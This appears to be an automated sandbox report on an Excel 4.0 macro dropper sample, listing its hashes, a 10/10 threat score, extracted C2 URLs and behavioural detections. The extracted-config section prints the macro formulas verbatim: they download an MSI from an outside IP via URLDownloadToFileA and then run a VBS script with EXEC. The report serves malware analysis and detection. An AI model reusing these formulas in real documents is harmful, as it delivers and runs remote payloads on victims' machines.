General

  • Target

    047b433186fe8cee97b6d095dc28069b

  • Size

    6KB

  • Sample

    231221-zgpe8adbfm

  • MD5

    047b433186fe8cee97b6d095dc28069b

  • SHA1

    92198e996ce4aabef03fb8d56a9ca891c4019ad7

  • SHA256

    d1114d0646df6681b8510027851cd52bb30f96dbebc553b25f56617433c0420b

  • SHA512

    89baf8027543358116e2d403fc51b293249ad7dc288d6c0084f02e05044041812a2b6f4cc71cdd202ac74b399d283a02950713b4b5881d167ab8f5b5b64e5bd7

  • SSDEEP

    192:NDSLluS/brA2OmmfRy8UhHFBFYucb98yquL+o:NMlu8M2w01FYlb98yqur

Score
10/10
xlm

Malware Config

Extracted

Rule
Excel 4.0 XLM Macro
C2

http://46.17.98.187/index.php

http://google.com/index.php

Attributes
  • formulas

    =CALL("Urlmon","URLDownloadToFileA","JJCCJJ",0,"http://46.17.98.187/index.php","C:\~\pes.msi",0,0) =CALL("Urlmon","URLDownloadToFileA","JJCCJJ",0,"http://google.com/index.php","C:\~\pes.msi",0,0) =EXEC("wscript C:\zer\spp.vbs") =HALT()

Extracted

Language
xlm4.0
Source
URLs
xlm40.dropper

http://46.17.98.187/index.php

xlm40.dropper

http://google.com/index.php

Targets

    • Target

      047b433186fe8cee97b6d095dc28069b

    • Size

      6KB

    • MD5

      047b433186fe8cee97b6d095dc28069b

    • SHA1

      92198e996ce4aabef03fb8d56a9ca891c4019ad7

    • SHA256

      d1114d0646df6681b8510027851cd52bb30f96dbebc553b25f56617433c0420b

    • SHA512

      89baf8027543358116e2d403fc51b293249ad7dc288d6c0084f02e05044041812a2b6f4cc71cdd202ac74b399d283a02950713b4b5881d167ab8f5b5b64e5bd7

    • SSDEEP

      192:NDSLluS/brA2OmmfRy8UhHFBFYucb98yquL+o:NMlu8M2w01FYlb98yqur

    Score
    10/10
    • Process spawned unexpected child process

      This typically indicates the parent process was compromised via an exploit or macro.

    • Process spawned suspicious child process

      This child process is typically not spawned unless (for example) the parent process crashes. This typically indicates the parent process was unsuccessfully compromised.

MITRE ATT&CK Enterprise v15

Tasks